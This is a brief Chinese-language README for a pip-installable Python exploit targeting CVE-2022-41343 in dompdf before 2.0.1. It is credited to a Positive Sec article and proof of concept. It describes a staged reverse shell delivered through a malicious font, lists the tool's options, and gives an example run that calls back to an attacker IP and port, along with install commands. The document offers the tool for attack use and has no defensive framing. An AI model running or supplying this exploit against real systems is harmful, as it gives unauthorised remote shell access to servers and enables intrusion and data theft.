🐍 CVE-2022-41343的Python利用
用于dompdf < 2.0.1的分阶段反向Shell
基于:Positive Sec的文章 和 PoC
cve-2022-41343 10.10.16.3 44444
usage: cve-2022-41343 [-h] [-l SERVER_PORT] [-s SHELL] [-n FONT_NAME] ip port
positional arguments:
ip Shell回调IP地址/主机
port Shell回调端口
options:
-h, --help 显示此帮助信息并退出
-l SERVER_PORT, --listen SERVER_PORT
服务器监听端口(默认:55555)
-s SHELL, --shell SHELL
远程Shell(默认:bash)
-n FONT_NAME, --font-name FONT_NAME
利用字体名称(默认:comicsploitz)
python3 -m pip install cve-2022-41343
python3 -m pip install cve-2022-41343-1.0.0-py3-none-any.whl